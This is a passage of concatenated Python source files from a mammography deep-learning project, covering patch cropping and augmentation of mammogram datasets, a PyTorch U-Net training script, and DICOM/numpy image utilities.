all_info_dict = []
for key in tqdm(keys[:]):
# for key in ['11737954-1']:
label_path = label_dict[key]
image_path = image_dict[key]
info_dict = augment_roi_2D(image_path, label_path, output_dir,
patch_size=512, n_patches=10,
max_degree=180, max_translation=100,
upscales=[1.0], downscales=[1/2.0, 1/4.0, 1/8.0, 1/16.0],
size_list=[50/512, 100/512],
resize_jitter_list=[0.75, 1.25],
do_flip=True,
padding="constant",
key=key)
all_info_dict.append(info_dict.items())
elif FLAGS.task == 'neg_crop_inbreast':
neg_imagedir = r"/data/log/mammo/patches_multiscale_mass_0406_inbreast_neg_scale0.12"
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# crop from negative images as well
keys = sorted(list(set(image_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:]):
print(key)
label_path = label_dict.get(key, '')
image_path = image_dict.get(key, '')
generate_negative_sample(image_path, label_path, key=key,
neg_imagedir=neg_imagedir,
patch_size=512,
ignore_padding=128, # generally keep it as patch_size / 4
n_patches=10,
scale=0.125,
nonezero_threshold=0.5, # 0.5 for scale [0.125], 0.75 for scales [0.25, 0.5 and 1.0]
resize_jitter_list=[0.75, 1.25])
# all_info_dict.append(info_dict.items())
elif FLAGS.task == 'split_ziwei':
positive_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_ziwei_pos/**/*_mask.png'
negative_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_ziwei_neg_scale1.00/**/*_mask.png'
strata_regex_pattern = 'scale1.00'
positive_dir = positive_patch_search_path.split('*')[0]
negative_dir = negative_patch_search_path.split('*')[0]
output_dir = r'/data/log/mammo/patches_multiscale_mass_0406_ziwei_stratefied/'
stratefied_sampling_neg_and_pos(positive_patch_search_path=positive_patch_search_path,
negative_patch_search_path=negative_patch_search_path,
strata_regex_pattern=strata_regex_pattern,
positive_dir=positive_dir,
negative_dir=negative_dir,
output_dir=output_dir)
elif FLAGS.task == 'split_inbreast':
positive_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_inbreast_pos_small/**/*_mask.png'
negative_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_inbreast_neg_scale0.12/**/*_mask.png'
strata_regex_pattern = 'scale0.12'
positive_dir = positive_patch_search_path.split('*')[0]
negative_dir = negative_patch_search_path.split('*')[0]
output_dir = r'/data/log/mammo/patches_multiscale_mass_0406_inbreast_stratefied_small/'
stratefied_sampling_neg_and_pos(positive_patch_search_path=positive_patch_search_path,
negative_patch_search_path=negative_patch_search_path,
strata_regex_pattern=strata_regex_pattern,
positive_dir=positive_dir,
negative_dir=negative_dir,
output_dir=output_dir)
elif FLAGS.task == 'calc_cluster_crop':
output_dir = r"/data/log/mammo/calc_cluster_crop_affine_pos"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/png/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/bootstrap_mask_cleaned/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
# print(keys, image_dict, label_dict)
all_info_dict = []
for key in tqdm(keys[:]):
# for key in ['11737954-1']:
print(key)
# mask_path is [calc_mask_path, cluster_mask_path]
cluster_mask_path = label_dict[key].replace('bootstrap_mask_cleaned', 'calc_cluster_all')
calc_mask_path = label_dict[key]
mask_path = [calc_mask_path, cluster_mask_path]
image_path = image_dict[key]
AugmentedROICropper2D_v2(image_path, mask_path, output_dir,
patch_size=512, n_patches=10,
max_degree=5, max_translation=5,
upscales=[1.], downscales=[1.0],
size_range=[np.inf, -np.inf],
resize_jitter_range=[0.75, 1.25],
do_flip=True).deploy()
<file_sep># Modified for using ynet to seg the skin and classify.
# v0: only unet for skin.
import os
from torch import optim
from time import gmtime, strftime
from tensorboardX import SummaryWriter
os.sys.path.append(r'C:\Users\Xing\Projects\SDFY\mammo\projects\SDFY_project')
from SDFY_project.unet_model.unet_mass_light_v2 import * # for customed unet
# from SDFY_project.efficientunet.efficientynet import * # for efficientynet
from SDFY_project.uneunet_factoryt_factory.unet import * # for unet factory
from SDFY_project.data_generator_skin_ynet import *
from SDFY_project.tools import *
from lr_cosine import CosineAnnealingWarmUpRestarts
from SDFY_project.sampler import BalancedBatchSampler
from SDFY_project.losses import dice_loss
from SDFY_project.Unet_metrics.unet_metircs import *
from SDFY_project.auto_augment.auto_augment import AutoAugment, Cutout
import warnings
warnings.filterwarnings(action='ignore')
if __name__ == '__main__':
time_string = strftime("%a%d%b%Y-%H%M%S", gmtime())
# result_path = r'E:\Data\HeronTech\SDFY\ori_marigin_crop\model_train'
result_path = r'E:\Xing\SDFY_skin\Train_log'
descrip = 'July20_resunext50_light_384_imgaug'
model_save_path = os.path.join(result_path, descrip, time_string, 'save')
tb_save_path = os.path.join(result_path, descrip,time_string, 'tb')
os.makedirs(model_save_path)
os.makedirs(tb_save_path)
writer = SummaryWriter(log_dir=tb_save_path)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
# torch.cuda.set_device(1)
# model = get_unetx_reduce_fpn_v1().cuda()
# model = resnet.resnet10(in_channels=8, drop_rate=0.3, sample_size=64, sample_duration=16, shortcut_type='B', num_classes=1).cuda()
# model = resnet_v2.resnet10(in_channels=8, drop_rate=0.3, sample_size=64, sample_duration=16, shortcut_type='B',
# num_classes=1).cuda()
num_classes = 1
# model = ResNet(dataset='calc', depth=50, num_classes=num_classes).cuda()
# model = UNet(n_channels=3,n_classes=num_classes,height=384,width=384).cuda()
# model = get_efficientynet_b0(out_channels=1, n_classes=num_classes, concat_input=True, pretrained=True).cuda()
model = unet_resnet(resnet_type='resnext50_32x4d',in_channels=3,out_channels=1).cuda()
# os.environ["CUDA_VISIBLE_DEVICES"] = '0,1'
# if torch.cuda.device_count()>1:
# model = nn.DataParallel(model).cuda()
criterion = nn.BCELoss().cuda()
# criterion = nn.NLLLoss()
# criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=1e-8, betas=(0.9, 0.999), eps=1e-08, weight_decay=1e-5)
#scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', patience=10, threshold=0.01, factor=0.3)
scheduler = CosineAnnealingWarmUpRestarts(optimizer, T_0=10, T_mult=2, eta_max=1e-3, T_up=1, gamma=0.5)
train_transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
AutoAugment(),
transforms.ToTensor()
])
trainconfig = {"dataset": 'mammo_calc',"subset": '0'}
train_config = dataconfig(**trainconfig)
# training_data = DataGenerator(train_config,transform= train_transform)
training_data = DataGenerator(train_config, transform= transforms.ToTensor())
# train_loader = DataLoader(training_data, num_workers=4, batch_size=16, shuffle= True)
train_loader = DataLoader(training_data,num_workers=4,
sampler=BalancedBatchSampler(training_data, type='single_label'),
batch_size = 6, drop_last= True)
valconfig = {"dataset": "calc","subset": '1'}
val_config = dataconfig(**valconfig)
validation_data = DataGenerator(val_config,transform= transforms.ToTensor())
val_loader = DataLoader(validation_data, num_workers=4,shuffle=True)
print('data loader finished')
Train_C_flag = False
epoch_len = 200
bst_acc = 0
bst_loss = 1e10
bst_tsh = 0.1
if Train_C_flag == True:
model_load_path = r'E:\Xing\mass0508\Train_log\June12_ynet_light_bridgel\Fri12Jun2020-204633\save'
model_name = r'\best_model.pth'
checkpoint = torch.load(model_load_path + model_name)
model.load_state_dict(checkpoint['state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer'])
Epoch = checkpoint['epoch']
else:
Epoch = 0
for epoch in range(Epoch,Epoch+epoch_len):
model.train()
losses = AverageMeter()
losses_dice = AverageMeter()
losses_cls = AverageMeter()
accuracies = AverageMeter()
for i, (images,masks,labels) in enumerate(train_loader):
targets = labels.cuda()
masks = masks.cuda()
est_maps = model(images.cuda())
# print('outputs: ', outputs.data.cpu().numpy().tolist(), 'targets: ', targets.data.cpu().numpy().tolist())
est_maps = F.sigmoid(est_maps)
est_tags = torch.ones(labels.shape[0]).cuda()
loss_dice = dice_loss(est_maps, masks)
loss_cls = criterion(est_maps,masks)
loss = 0.5*loss_dice + 0.5*loss_cls
acc = calculate_accuracy_binary(est_tags, targets)
losses.update(loss.item(), targets.size(0))
losses_dice.update(loss_dice.item(), targets.size(0))
losses_cls.update(loss_cls.item(), targets.size(0))
accuracies.update(acc, targets.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
if len(est_maps.shape) >3:
est_maps = torch.squeeze(est_maps,1)
if (epoch) % 50==0 and i % 20 == 0:
# _, predict = torch.max(est_tags, 1)
predict = est_tags
add_image_3d(images, predict, targets, writer, subset='train', epoch=epoch, name= str(i)+'_image')
add_image_3d(torch.unsqueeze(masks,1), predict, targets, writer, subset='train', epoch=epoch,name = str(i)+'_masks')
add_image_3d(torch.unsqueeze(est_maps,1), predict, targets, writer, subset='train', epoch=epoch,name = str(i)+'_est_maps')
#print(i,loss)
losses_val = AverageMeter()
losses_val_dice = AverageMeter()
losses_val_cls = AverageMeter()
accuracies_val = AverageMeter()
model.eval()
with torch.no_grad():
for j, (inputs_val,masks_val, targets_val) in enumerate(val_loader):
targets_val = targets_val.cuda()
masks_val = masks_val.cuda()
outputs_val = model(inputs_val.cuda())
outputs_val = F.sigmoid(outputs_val)
est_tags_val = torch.ones(targets_val.shape[0]).cuda()
loss_dice_val = dice_loss(outputs_val, masks_val)
loss_cls_val = criterion(outputs_val, masks_val)
loss_val = 0.5*loss_dice_val + 0.5*loss_cls_val
acc_val = calculate_accuracy_binary(est_tags_val, targets_val)
losses_val.update(loss_val.item(), targets_val.size(0))
losses_val_dice.update(loss_dice_val.item(), targets_val.size(0))
losses_val_cls.update(loss_cls_val.item(), targets_val.size(0))
accuracies_val.update(acc_val, targets_val.size(0))
if len(outputs_val.shape) > 3:
outputs_val = torch.squeeze(outputs_val,1)
if (epoch ) % 20 == 0 and j % 10 == 0:
print(j, loss_val)
# _,predict = torch.max(est_tags_val,1)
predict = est_tags_val
add_image_3d(inputs_val, predict, targets_val, writer, subset='val', epoch=epoch, name = str(j)+'_images')
add_image_3d(torch.unsqueeze(masks_val,1), predict, targets_val, writer, subset='val', epoch=epoch, name = str(j)+'_masks')
add_image_3d(torch.unsqueeze(outputs_val,1), predict, targets_val, writer, subset='val', epoch=epoch, name = str(j)+'_est_maps')
# scheduler.step(losses_val.avg)
scheduler.step()
print('epoch: ', epoch+1, 'train_loss: ', losses.avg, 'train_acc: ', accuracies.avg,
'val_loss: ', losses_val.avg, 'val_acc: ', accuracies_val.avg)
# if bst_loss >= losses_val.avg or abs(bst_loss - losses_val.avg)<=bst_tsh:
if bst_loss >= losses_val.avg:
# if bst_acc <= accuracies_val.avg:
save_file_path = os.path.join(model_save_path, 'best_model.pth')
states = {'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict()}
torch.save(states, save_file_path)
better_epoch = epoch
bst_acc = accuracies_val.avg
bst_loss = losses_val.avg
print('better model found at epoch {} with val_loss {} and val_acc {}'.format(better_epoch,bst_loss,bst_acc))
# Save model and print something in the tensorboard
# Save model and print something in the tensorboard
writer.add_scalars('loss/epoch',
{'train loss': losses.avg, 'validation loss': losses_val.avg,
'train dice loss':losses_dice.avg,'valid dice loss':losses_val_dice.avg,
'train cls loss':losses_cls.avg,'valid cls loss':losses_val_cls.avg,}, epoch + 1)
# writer.add_scalars('acc/epoch',
# {'train accuracy': accuracies.avg, 'validation accuracy': accuracies_val.avg}, epoch + 1)
writer.add_scalars('Learning Rate/epoch',
{'train accuracy': optimizer.param_groups[0]['lr']}, epoch + 1)
# if (epoch + 1) % 10 == 0:
# save_file_path = os.path.join(model_save_path, 'save_{}.pth'.format(epoch+1))
# states = {'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict()}
# torch.save(states, save_file_path)
# if (epoch + 1) % 50 == 0:
# add_image(inputs, outputs, targets, names, writer, subset='train', epoch=epoch + 1)
<file_sep>"""This file contains utility functions used for numpy data manipulation"""
import json
import logging
try:
import dicom
except:
import pydicom as dicom
import matplotlib.pylab as plt
import numpy as np
import pandas as pd
import os
import SimpleITK as sitk
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
class NumpyEncoder(json.JSONEncoder):
"""This is a Encoder used to dump numpy arrays to json files.
It also converts np.int64 (not python serializable) to python int
Example:
a = np.array([1, 2, 3])
print(json.dumps({'aa': [2, (2, 3, 4), a], 'bb': [2]}, cls=NumpyEncoder))
Output:
{"aa": [2, [2, 3, 4], [1, 2, 3]], "bb": [2]}
"""
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, np.integer):
return int(obj)
if isinstance(obj, np.float32) or isinstance(obj, np.float16):
return float(obj)
return json.JSONEncoder.default(self, obj)
def convert_to_unit8(pixel_array, from_bit=16, to_bit=8):
"""
Convert dicom dataset to an uint8 numpy array
Args:
pixel_array: a numpy array
from_bit: bit to convert from
to_bit: bit to convert to
Returns:
pixel_array: a converted pixel_array
"""
if from_bit == to_bit:
return pixel_array
# TODO: this is not exactly right. As 0-255 only has 2**8-1 scales
pixel_array = pixel_array * (2 ** (to_bit - from_bit))
if to_bit == 8:
pixel_array = pixel_array.astype(np.uint8)
else:
raise ValueError('Unsupported bit type {}-bit!'.format(to_bit))
return pixel_array
def get_new_dimensions(orig_shapes, min_dimension, max_dimension):
"""Get new dimensions based on the target shape limits
The output size can be described by two cases:
1. If the image can be rescaled so its minimum dimension is equal to the
provided value without the other dimension exceeding max_dimension,
then do so.
2. Otherwise, resize so the largest dimension is equal to max_dimension.
Args:
orig_shapes:
min_dimension:
max_dimension:
Returns:
new_shapes: a tuple of new dimensions
"""
min_target = min(orig_shapes)
max_target = max(orig_shapes)
if max_target * min_dimension / min_target < max_dimension:
ratio = min_dimension / min_target
else:
ratio = max_dimension / max_target
new_shapes = tuple(int(shape * ratio) for shape in orig_shapes)
return new_shapes
def get_pixel_array_from_dicom_path(filepath, mismatch=1, to_bit=8, floor=None, ceiling=None):
"""
Read image from dicom file and conver to numpy array.
Args:
filepath: dicom filepath
mismatch: number of pixels to drop in pixel_array in case of a shape mismatch
to_bit: bit to convert to, 8 and 16 supported. Return raw array if set to -1.
floor: manually override bit conversion
ceiling: manually override bit conversion
Returns:
pixel_array: a numpy array containing the image stored in dicom file
"""
# read dicom files
ds = dicom.read_file(filepath)
# Get image numpy array
# Image dicom file is in 16 bit and needs to be converted
try:
try:
pixel_array = ds.pixel_array
except:
# pydicom cannot handle lossless jpeg
reader = sitk.ImageSeriesReader()
reader.SetFileNames([filepath])
sitk_img = reader.Execute()
pixel_array = sitk.GetArrayFromImage(sitk_img)[0, ...]
try:
if ds.PresentationLUTShape == 'INVERSE':
pixel_array = pixel_array.max() - pixel_array
except:
logging.debug('PresentationLUTShape is INVERSE!')
if to_bit == -1:
# return the raw image
return pixel_array
if floor is not None and ceiling is not None:
pixel_array = np.clip(ds.pixel_array, a_min=floor, a_max=ceiling)
pixel_array = (pixel_array.astype(float) - floor) / (ceiling - floor) * (2 ** to_bit - 1)
if to_bit == 8:
pixel_array = pixel_array.astype(np.uint8)
elif to_bit == 16:
pixel_array = pixel_array.astype(np.uint16)
else:
raise ValueError('Unsupported bit type {}-bit!'.format(to_bit))
elif ds.BitsStored != to_bit:
print('Converting from {}-bit to {}-bit'.format(ds.BitsStored, to_bit))
pixel_array = convert_to_unit8(pixel_array, to_bit=to_bit)
except:
# Some mask has size mismatch of exactly one, then manually discard one element
try:
# all masks are stored in uint8 format
pixel_array = np.fromstring(ds.PixelData, dtype=np.uint8)
pixel_array = pixel_array[mismatch:].reshape((ds.Rows, ds.Columns))
except:
raise ValueError('The img size mismatches in {} and is not {}'.format(filepath, mismatch))
return pixel_array
def gen_single_input(single_image_path):
"""Read from image path and return a 3 channel color image in the format of numpy array
Args:
single_image_path:
Returns:
img_color: a 3 channel numpy array
"""
filepath = single_image_path
img = plt.imread(filepath) * 255
img = img.astype(np.float32)
# shenzhen dataset has 3 channels
if len(img.shape) == 3:
img_color = img
# some nih png file has four channels RGBA
# e.g., '/data/dataset/images/images_003/00006074_000.png'
# use first 3 channels RGB only
if img.shape[-1] == 4:
img_color = img[:, :, :3]
# most nih dataset has single grayscale channel
elif len(img.shape) == 2:
img_color = np.dstack([img] * 3)
return img_color
def input_generator(filepath_list=[], dirname=None):
"""
Yield a generator of image numpy array and the corresponding filepath
Args:
filepath_list:
dirname:
Yields:
img_color:
filepath
"""
if not filepath_list and dirname:
print('******* dirname specified!')
filepath_list = [os.path.join(dirname, filename)
for filename in os.listdir(dirname) if filename.endswith('.png')]
for filepath in filepath_list:
img_color = gen_single_input(filepath)
img_color = np.reshape(img_color, [-1])
print('************* Input image array:')
print([pix for pix in img_color[:100]])
yield img_color, filepath
def diff_df(df1, df2):
"""Identify differences between two pandas DataFrames"""
assert (df1.columns == df2.columns).all(), "DataFrame column names are different"
if any(df1.dtypes != df2.dtypes):
"Data Types are different, trying to convert"
df2 = df2.astype(df1.dtypes)
if df1.equals(df2):
return None
else:
# need to account for np.nan != np.nan returning True
diff_mask = (df1 != df2) & ~(df1.isnull() & df2.isnull())
ne_stacked = diff_mask.stack()
changed = ne_stacked[ne_stacked]
changed.index.names = ['id', 'col']
difference_locations = np.where(diff_mask)
changed_from = df1.values[difference_locations]
changed_to = df2.values[difference_locations]
return pd.DataFrame({'from': changed_from, 'to': changed_to},
index=changed.index)
def concat_df(input_csv_path_list, output_csv_path=None):
"""Concatenate csv files and return the combined dataframe
Args:
input_csv_path_list:
output_csv_path:
Returns:
"""
df_all = None
for csv_path in input_csv_path_list:
df = pd.read_csv(csv_path)
print('{}: length {}'.format(csv_path, len(df)))
try:
df_all = pd.concat([df_all, df])
except:
df_all = df
if output_csv_path:
df_all.to_csv(output_csv_path, index=False)
print('concatenated df length {}'.format(len(df_all)))
return df_all
<file_sep>"""This file contains utility functions used for numpy-based input augmentation
TODO: make more general for 3D images
"""
import logging
import cv2
import random
import scipy.ndimage
from skimage.filters import threshold_otsu, gaussian
try:
import dicom
except:
import pydicom as dicom
import numpy as np
from io import BytesIO
from skimage.morphology import erosion, square, disk
from skimage import measure
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
def apply_mirroring(data, labels):
"""
Apply mirroring to left, right, top, and bottom
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Mirrored data and labels
"""
data_shape = data.shape[0:2]
data = np.lib.pad(data, ((data_shape[0]-1, data_shape[0]-1), (data_shape[1]-1, data_shape[1]-1)), 'reflect')
labels = np.lib.pad(labels, ((data_shape[0]-1, data_shape[0]-1), (data_shape[1]-1, data_shape[1]-1), (0, 0)), 'reflect')
return data, labels
def random_rotation(data, labels):
"""
Perform random rotation on data and labels
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Rotated data and labels
"""
angle_deg = random.uniform(-180.0, 180.0)
data = scipy.ndimage.interpolation.rotate(data, angle_deg, reshape=False)
labels = scipy.ndimage.interpolation.rotate(labels, angle_deg, reshape=False)
return data, labels
def random_flip_left_right(data, labels):
"""
Perform random flip left and right on data and labels
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Randomly flipped data and labels
"""
flip = bool(random.getrandbits(1))
if flip:
data = np.fliplr(data)
labels = np.fliplr(labels)
return data, labels
def get_next_dividable_shape(input_shape, block_shape):
"""Get the minimum new_shape >= shape that is dividable by block_shape
Args:
input_shape: original shape
block_shape: shape to be multiples of. Can be scalar, or a list with the same shape as input_shape
Returns:
new_shape
"""
input_shape = np.array(input_shape)
block_shape = np.array(block_shape)
residual_shape = input_shape - (input_shape // block_shape) * block_shape
# if residual_shape == (0, 0), do not change shape
new_shape = input_shape + (block_shape - residual_shape) % block_shape
return new_shape
def crop_or_pad(image_array, target_shape):
"""Crop or pad image_array to target_shape
Use the top left corner (0, 0) as anchor and only pad or crop in the bottom right corner.
NB: this only works for 2D for now
Args:
image_array:
target_shape:
Returns:
"""
dtype = image_array.dtype
source_shape = image_array.shape[:2]
target_shape = target_shape[:2]
if tuple(source_shape) == tuple(target_shape):
return image_array
max_shape = tuple(np.max([source_shape, target_shape], axis=0).astype(np.int))
image_array_new = np.zeros(max_shape, dtype=dtype)
image_array_new[:source_shape[0], :source_shape[1]] = image_array
image_array_new = image_array_new[:target_shape[0], :target_shape[1]]
assert tuple(image_array_new.shape) == tuple(target_shape)
return image_array_new
def center_pad(image, target_shape, mode='constant'):
"""Pad image symmetrically to target_shape
Args:
image: input np array
target_shape: final shape
mode: np.pad mode
"""
target_shape = np.asarray(target_shape)
source_shape = np.array(image.shape)
# top/left padding and bottom/right padding
padding_1 = (target_shape - source_shape) // 2
padding_2 = (target_shape - source_shape) - (target_shape - source_shape) // 2
image = np.pad(image, list(zip(padding_1, padding_2)), mode=mode)
assert image.shape == tuple(target_shape)
return image
def center_crop(data, crop_shape, labels=None):
"""
Perform random cropping after optional padding
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (unique values limited to (0, 1)), could be None
crop_shape: target shape after cropping
Returns:
Randomly cropped data and labels
"""
data_shape = data.shape[0:2]
assert (crop_shape[0] <= data_shape[0])
assert (crop_shape[1] <= data_shape[1])
nh = int((data_shape[0] - crop_shape[0]) / 2)
nw = int((data_shape[1] - crop_shape[1]) / 2)
data = data[nh:nh + crop_shape[0], nw:nw + crop_shape[1]]
if labels is not None:
labels = labels[nh:nh + crop_shape[0], nw:nw + crop_shape[1], :]
return data, labels
return data
def center_crop_or_pad(image, target_shape, mode='constant'):
"""Center crop or pad to target_shape
Only works for 2D images
Args:
image:
target_shape:
mode:
Returns:
"""
pad_target_shape = np.maximum(np.array(target_shape)[:2], image.shape[:2])
image = center_pad(image, target_shape=pad_target_shape, mode=mode)
image = center_crop(image, crop_shape=target_shape)
return image
def crop_around_point(image_array, center_yx, target_shape):
"""Center crop an image array around a point
Args:
image_array:
center_yx:
target_shape:
Returns:
"""
pad_y, pad_x = ((np.array(target_shape) + 1) // 2).astype(np.int)
pad_width = ((pad_y, pad_y), (pad_x, pad_x))
image_array = np.pad(image_array, pad_width=pad_width, mode='constant')
ymin, xmin = (np.array(center_yx) + np.array([pad_y, pad_x]) - np.array(target_shape) // 2).astype(np.int)
ymax, xmax = (np.array([ymin, xmin]) + np.array(target_shape)).astype(np.int)
cropped_array = image_array[ymin:ymax, xmin:xmax]
assert cropped_array.shape == tuple(target_shape)
return cropped_array
def random_crop(data, labels, crop_shape, padding=None):
"""
Perform random cropping after optional padding
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
crop_shape: target shape after cropping
padding: how many pixels to pad before cropping
Returns:
Randomly cropped data and labels
"""
data_shape = data.shape[0:2]
if padding:
data_shape = (data_shape[0] + 2 * padding, data_shape[1] + 2 * padding)
npad = ((padding, padding), (padding, padding), (0, 0))
data = np.lib.pad(data, pad_width=npad, mode='constant', constant_values=0)
labels = np.lib.pad(labels, pad_width=npad, mode='constant', constant_values=0)
nh = random.randint(0, data_shape[0] - crop_shape[0])
nw = random.randint(0, data_shape[1] - crop_shape[1])
data = data[nh:nh + crop_shape[0], nw:nw + crop_shape[1]]
labels = labels[nh:nh + crop_shape[0], nw:nw + crop_shape[1], :]
return data, labels
def random_resize(data, labels):
"""Perform random resizing
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Randomly resized data and labels, potentially with different shape
"""
data_shape = data.shape[0:2]
resize_ratio = np.random.uniform(low=1.0, high=1.2, size=2)
data = scipy.ndimage.interpolation.zoom(input=data, zoom=resize_ratio)
labels = scipy.ndimage.interpolation.zoom(input=labels, zoom=np.append(resize_ratio, 1.0))
labels = np.around(labels)
return data, labels
def resize(image, scale=None, dst_shape=(0, 0), interpolation=None):
"""Customize resize wrapper of cv2.resize
Automatically select best interpolation method.
Note: Pay special attention to the x and y dimension. Numpy uses (y, x) order but openCV
uses (x, y) order.
Args:
image:
scale:
dst_shape: (x, y) order
interpolation:
"""
src_shape = np.asarray(image.shape) # in the order of (y, x, ...)
src_shape = src_shape[:2][::-1] # get the first two dimension and flip them
if scale is not None:
dst_shape = (src_shape * scale).astype(np.int)
else:
dst_shape = np.asarray(dst_shape).astype(np.int)
if interpolation is None:
if (scale is not None and scale >= 1) or np.any(dst_shape > src_shape):
interpolation = cv2.INTER_LINEAR
else:
interpolation = cv2.INTER_AREA
image_resized = cv2.resize(image, tuple(dst_shape), interpolation=interpolation)
return image_resized
def soft_rescale(data):
"""Soft scale data back to [0, 1]
If data is in [0, 1], do nothing. Otherwise, scale the side outside this bound back to [0, 1]
Args:
data:
Returns:
"""
a_max = max(data.max(), 1)
a_min = min(data.min(), 0)
data = (data - a_min) / (a_max - a_min)
return data
def random_brightness(data, labels, max_delta=0.2):
"""Perform random brightness adjustment. Add a random number to the image
Args:
data: a float array in [0, 1]
labels:
max_delta: maximum adjustment, in [-1, 1]
Returns:
"""
delta = np.random.uniform(low=-max_delta, high=max_delta)
data = data + delta
# scale back to [0, 1]
data = soft_rescale(data)
return data, labels
def random_contrast(data, labels, lower=0.8, upper=1.2):
"""Perform random contrast adjustment for 2d images
For each `x` pixel in a channel, `(x - mean) * contrast_factor + mean`.
Args:
data: numpy array with values in [0, 1]
labels:
lower: lower bound of contrast adjustment, [0, 1]
upper: upper bound of contrast adjustment, [1, inf]
Returns:
"""
contast_factor = np.random.uniform(low=lower, high=upper)
mean = data.mean()
data = (data - mean) * contast_factor + mean
# scale back to [0, 1]
data = soft_rescale(data)
return data, labels
def pad(image_array, padding=(0, 0)):
"""Pad image with zero
Args:
image_array:
padding:
Returns:
"""
shape = np.array(image_array.shape)
new_shape = shape + 2 * padding
image_array_padded = np.zeros(new_shape)
image_array_padded[padding[0]:(shape[0] - padding[0]), padding[1]:(shape[1] - padding[1])] = image_array
return image_array_padded
def normalize(image_array, a_min=-np.inf, a_max=np.inf,
how='extend', lower_sigma=3, upper_sigma=6, bg_thresh=None, force_otsu=False):
"""Clip image and then normalize to [0, 1]
Args:
image_array: the input numpy array
a_min:
a_max:
lower_sigma:
upper_sigma:
bg_thresh:
how: the method to normalize, can be `optimize` or `extend`
`optimize`: use automatic histogram normalization to optimize contrast
`extend`: clip image and extend max to 1 and min to 0
Returns:
"""
image_array = image_array.astype(np.float)
if how == 'optimize':
image_array = normalize_auto(image_array, lower_sigma=lower_sigma, upper_sigma=upper_sigma,
bg_thresh=bg_thresh, force_otsu=force_otsu)
elif how == 'extend':
if 0 < a_min < 1 and 0 < a_max < 1:
if bg_thresh:
image_array_fg = image_array[image_array > bg_thresh]
a_max = np.percentile(image_array_fg, a_max)
a_min = np.percentile(image_array_fg, a_min)
image_array = np.clip(np.fabs(image_array), a_min, a_max)
image_array -= np.amin(image_array)
if np.amax(image_array) == 0:
# uniform image
return np.ones_like(image_array)
image_array /= np.amax(image_array)
elif how == 'raw':
image_array /= 255
else:
raise ValueError('Unknown option {}'.format(how))
return image_array
def normalize_auto(image_array, lower_sigma=2, upper_sigma=4, bg_thresh=None, bg_percentile=20, force_otsu=False):
"""Clip mammo to appropriate window
Note: goals of this auto normalization algorithm:
1. Set backgound to 0
2. Maximize contrast while discarding minimum information
3. Applying this function twice should yield the same results, i.e., this function should be idempotent,
f(f(x)) = f(x). https://en.wikipedia.org/wiki/Idempotence#Unary_operation
Args:
image_array: the input numpy array
bg_thresh: ignore pixel values < bg_thresh in calculating 6
lower_sigma:
upper_sigma:
auto_norm: boolean, whether to use automated normalization
Returns:
image_array_clipped: a numpy array with range [0, 1]
"""
# select the fg pixels
image_array = image_array.astype(np.float)
if not bg_thresh:
# if 20 pct is 0, then background is 0, set bg_thresh = 0; otherwise use otsu to find bg_thresh
if not force_otsu and np.percentile(image_array, bg_percentile) == 0:
bg_thresh = 0
else:
bg_thresh = threshold_otsu(image_array)
print('background threshold {}'.format(bg_thresh))
image_array_fg = image_array[image_array > bg_thresh]
# select 5 pct to 95 pct to perform robust normalization
pct_5 = np.percentile(image_array_fg, 5)
pct_95 = np.percentile(image_array_fg, 95)
image_array_fg_robust = image_array_fg[(image_array_fg > pct_5) & (image_array_fg < pct_95)]
std = np.std(image_array_fg_robust)
mean = np.mean(image_array_fg_robust)
# set (mean - lower_sigma * std) to 0, and (mean + upper_sigma * std) to 1
a_min = mean - lower_sigma * std
a_max = mean + upper_sigma * std
# set bg pixels to a_min. Sometimes bg_threshold > a_min
image_array[image_array <= bg_thresh] = a_min
# clip
image_array_clipped = np.clip(image_array, a_min=a_min, a_max=a_max)
image_array_clipped = (image_array_clipped - a_min) / (a_max - a_min)
return image_array_clipped
def binary_mask_to_probability_mask(image_array, ero_factor=4, blur_factor=12):
"""Convert binary mask to probability
Erode first and then blur with a Gaussian kernel to largely constrain non-zero values within the original mask
Args:
image_array:
ero_factor: erosion kernel size is 1/ero_factor of mask size (geometric averaged size)
blur_factor: blurring kernel size is 1/blur_factor of mask size (two dimensional size)
Returns:
"""
assert len(np.unique(image_array)) <= 2, 'input is not binary array!'
assert np.max(image_array) <= 1
x, y = np.where(image_array == np.max(image_array))
xmin, xmax = min(x), max(x)
ymin, ymax = min(y), max(y)
size = np.asarray([xmax - xmin, ymax - ymin])
if ero_factor:
